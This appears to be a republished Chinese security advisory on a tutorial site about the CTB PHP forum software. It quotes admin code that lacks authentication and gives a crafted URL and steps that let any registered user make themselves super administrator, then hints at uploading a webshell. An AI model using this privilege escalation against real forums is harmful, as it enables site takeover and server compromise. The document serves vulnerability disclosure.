漂亮但不安全的CTB - 明輝手游網

<form id="hz9zz"></form>

<form id="hz9zz"></form>

<nobr id="hz9zz"></nobr>

<form id="hz9zz"></form>

明輝手游網中心：是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺！

文章發布全站軟件文章熱門搜索：分享文件夾皮膚鈴聲剪輯音效資訊首頁騰訊視頻愛奇藝暴風影音酷狗音樂酷我音樂影音大全軟件下載軟件教程電腦系統下載聊天工具辦公軟件殺毒教程系統工具圖形圖像電腦學習應用軟件網絡軟件蘋果應用注冊碼網站教程技術開發安卓教程其它教程您當前所在位置：網視手游站 -> 網站教程 -> 漂亮但不安全的CTB
漂亮但不安全的CTB 發表時間：2024-01-25 來源：明輝站整理相關軟件相關文章人氣： [摘要]>>>Dedicated This Scrap To CaoJing<<< 涉及版本： ^^^^^^^ 目前所有版本（現在1.3Alpha為最高版本）描述： ^^^^^^ CTB是一款由實易數碼<11cn.org>;開發和維護的源代碼開放的PHP論... >>>Dedicated This Scrap To CaoJing<<< 涉及版本： ^^^^^^^ 目前所有版本（現在1.3Alpha為最高版本）描述： ^^^^^^ CTB是一款由實易數碼<11cn.org>;開發和維護的源代碼開放的PHP論壇。由于其后臺管理文件驗證存在缺陷，可能導致非法用戶直接添加論壇超級管理員，進而威脅論壇或服務器安全。具體： ^^^^ CTB書寫非常規范，代碼井然有序，賞心悅目，的確是優美的程序；特別是其功能模塊，著實讓小弟學習了一把。但安全方面卻令人堪憂：試看如下代碼： /admin/main.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ //獲取get變量 if( is_array($_GET) ) { foreach($_GET as $k=>$v) { if( is_array( $_GET[$k]) ) { foreach($_GET[$k] as $k2=>$v2) { $return[$k][$k2] = $v2; } } else { $return[$k] = $v; } } } ... $mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod']; if (!file_exists($mod.".php" { $mod = "mainright"; } require_once ($mod.".php"; //----------------------------------------------------------------------------- //初始化類變量 $ctb = new Module; $ctb->set = $set; $ctb->tplPath = "./templates"; $ctb->input = $return; $ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION; $ctb->execute(); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 這里沒有任何驗證，我們看看添加管理員的文件： /admin/systemuser.php ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ class Module extends CommonClass //系統管理模塊子類 { function execute() { switch($this->input['action']) { ... case 'addSystemUser': $this->addSystemUser(); break; ... } } function addSystemUser() { //輸入數據簡單格式化 $this->inputCheck("main.php?mod=systemuser&action=showSystemUser"; //執行添加操作 $this->file = "../".$this->set[dataPath]."/users/list.php"; $systemLine = $this->select(4, $this->input['systemUserName']); .... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 依然沒有驗證，一路順利��！利用方法： ^^^^^^^ 先注冊一個用戶：登陸ID： cat 用戶名 : dog 密碼: ilikecat 重復密碼: ilikecat 信箱: cat@dog.com 接著提交如下URL： http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser 哈哈，你現在已經是超級管理員了，不相信？提交如下URL后臺登陸： http://www.psych.com/ctb/admin/main.php?mod=login 管理名稱: cat 管理密碼: ilikecat 咦...還真成功了！你現在是不是想更改后臺上傳文件類型，然后upload webshell？哼，被我猜到了吧... 后記：另外發現CTB代碼注釋有些扎眼的錯別字，大煞風景，希望可以一起修正。標簽：漂亮但不安全的CTB 上一篇：讓你的.NET程序兼容不同版本的Dll文件下一篇：ASP中連接數據庫的5種方法	推薦資訊總人氣榜 1PS提示：因為圖層已鎖定，無法編輯圖層的處理方法 2Adobe Illustrator CS5 序列號大全 3picacg蘋果版怎么找不到\|picacg ios版是不是下架了介紹 4ACDsee注冊碼免費分享（含ACDsee18、ACDsee10等版本） 5蘋果iphone自動時間不準確的多種校正方法 6PDF瀏覽器能看3D文件嗎？PDF瀏覽器看3D文件圖文詳細教程 7Potato(馬鈴薯聊天)怎么注冊不了\|Potato不能注冊處理方法介紹 8Potato(土豆聊天)怎么換頭像\|Potato app更改頭像方法介紹 9ipad版office如何激活? office365激活的圖文說明教程 10最新的Adobe Illustrator CS4序列號大全 11Mac怎么通過設置VPN來登錄youtube等國外網站 12qq郵件是否已讀怎么看 QQ郵箱已經發出去的郵件怎么知道對方是否已經查看 1支付寶怎么交學費，支付寶教育繳費圖文說明教程 2高鐵兒童票網上怎么買，網上買高鐵兒童票具體流程 3京東微笑面單是什么，京東微笑快遞單有什么用 4GG廣告申請 5新手誤區：揭露seo反鏈工具的真實面目 6被降權問題淺談百度頁面權重 72014年9月百度綠蘿算法再度升級 8百度降權并不可怕 9淺談增加網站外部鏈接的方法 10提高谷歌聯盟Adsense收入4種方法 11百度減少收錄是什么原因？ 12恢復百度權重的一些心得最新教程本月人氣 1iOS12beta8如何更新_iOS12beta8更新方法 2iOS 12 beta8更新了什么_iOS 12 beta8值得更新嗎 3ios12beta6好用嗎_ios12beta6值得更新嗎 4iPhone XS強制重啟方法說明_iPhone XS如何強制重啟 52018蘋果新品公布會直播(平臺+入口)_2018蘋果秋季公布會直播 6iphone雙卡雙待有哪一些_iphone雙卡雙待神器名單 7蘋果雙卡雙待神器如何_蘋果雙卡雙待神器有哪一些 8iOS12無限彈更新提醒窗口bug如何辦_iOS12無限彈更新提醒窗口BUG處理方法 9蘋果手機系統如何升級到iOS 11_蘋果手機系統升級到iOS 11圖文說明教程 10蘋果手機熄屏狀態如何發送求救信息與定位_蘋果手機熄屏狀態發送求救信息與定位圖文說明教程 11iOS12beta11好用嗎_iOS12beta11值得更新嗎 122018三款新iPhone曝光_2018三款新iPhone如何 1qq瀏覽器安全網址認證如何打開 qq瀏覽器安全網址認證打開圖文說明教程 2用微信如何發送文件手機微信發送文件方法圖文詳細說明 3阿里旺旺如何加好友？淘寶阿里旺旺加好友步驟 4電腦瀏覽器下載排行榜2017 官方瀏覽器下載排行榜前10名 5wps表格如何算平均值 6用WPS表格2013統計所需鈔票張數 7uc瀏覽器愚人節新版最搞siao技巧玩法總結 8win10手機瀏覽器上手界面清新簡潔 9wps表格如何設置自己的模版 10支付寶錢包紅包口令如何用？紅包口令領紅包方法 11iphone6用什么sim卡？iphone6 sim卡分類 12iphone6群發短信圖文說明教程蘋果6如何群發短信步驟
相關文章 5.PHP的其他技巧入門者的福音：游戲開發新手基礎向導 2.PHP基礎 ASP中如何將代碼生成的文件設為只讀 4.與數據庫的連接給Asp.Net入門者的對于繼承與多態性的例子初寫論壇者的出錯集錦 3.從案例開始用ASP.NET完成容易的文字水印 ASP中連接數據庫的5種方法漂亮但不安全的CTB 讓你的.NET程序兼容不同版本的Dll文件

日韩精品一区二区三区高清